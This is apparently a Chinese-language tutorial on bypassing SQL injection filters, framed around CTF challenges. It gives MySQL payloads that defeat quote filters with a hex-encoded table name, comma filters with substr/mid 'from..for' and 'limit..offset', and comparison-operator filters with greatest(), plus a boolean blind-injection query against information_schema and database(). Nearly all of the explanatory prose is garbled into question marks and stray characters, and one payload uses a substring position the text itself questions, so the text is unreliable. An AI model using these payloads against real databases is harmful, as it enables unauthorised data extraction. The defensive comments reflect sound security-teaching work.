????sql????????????????????????????????????????????????sql??????????????????????????????к?????????sql???????????С?????е???????????????????????sql???????
????SQL????????????к?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????CTF??????????????????????У?????????sql?????????????????????????????????????????????????????????????
??????????????
?????????????????????????where????С???????????sql?????????????????????????????users??????????ε???????
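-- List the column names of table "users" from the catalog.
-- column_name is exposed by information_schema.columns; information_schema.tables
-- has no such column. The table name is given here as a quoted string literal.
select column_name from information_schema.columns where table_name = "users"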
?????????????????????????????????where????????????????????????????????????????????????????????
????users?????????????????7573657273????????sql????????
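-- Same catalog lookup with the table name written as a hex literal:
-- 0x7573657273 is the byte string 'users' (75 73 65 72 73), which MySQL
-- compares as a string. column_name is read from information_schema.columns,
-- the view that actually carries it.
-- No quote character appears, so removing quotes from input does not block this
-- form; bind the value as a query parameter rather than filtering characters.
select column_name from information_schema.columns where table_name = 0x7573657273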
????С??????????????????????
???????????????
???????????????????????substr() ??mid() ??limit????Щ???????????????????????substr()??mid()?????????????????from to???????????
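-- substr() and mid() also accept the `from <pos> for <len>` argument form,
-- which contains no comma. database() takes no arguments, so the call is
-- closed before the `from` keyword.
-- A filter that strips commas therefore does not prevent substring extraction;
-- the value has to be bound as a parameter instead.
select substr(database() from 1 for 1);
select mid(database() from 1 for 1);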
????????limit???????offset???????
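-- Return one row starting at offset 0, using the comma form `limit <start>, <count>`.
select * from news limit 0, 1;
-- Equivalent statement without a comma: `limit <count> offset <start>`.
select * from news limit 1 offset 0;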
????С?????from???????????
????????????(<??>)???
????????????????????????????????????????????????????????в????????????????????????????????greatest????????????
?????????????????sql???
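-- Boolean condition appended to the id lookup: is the ASCII code of a
-- one-character substring of the current database name greater than 64?
-- NOTE(review): MySQL string positions start at 1; confirm the position 0 used here.
select * from users where id = 1 and ascii(substr(database(), 0, 1)) > 64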
??????????????????????????????????????????????????????greatest????????????????greatest(n1??n2??n3????)???????????????(n1??n2??n3????)??????
????????????????sql?????????greatest??????μ????:
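-- greatest(x, 64) = 64 holds exactly when x <= 64, i.e. it is the negation of
-- x > 64 written without any < or > character.
-- Removing comparison operators from input is therefore not a control against
-- boolean conditions like this one; binding values as query parameters is.
-- NOTE(review): MySQL string positions start at 1; confirm the position 0 used here.
select * from users where id = 1 and greatest(ascii(substr(database(), 0, 1)), 64) = 64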
????С?????greatest()?????????????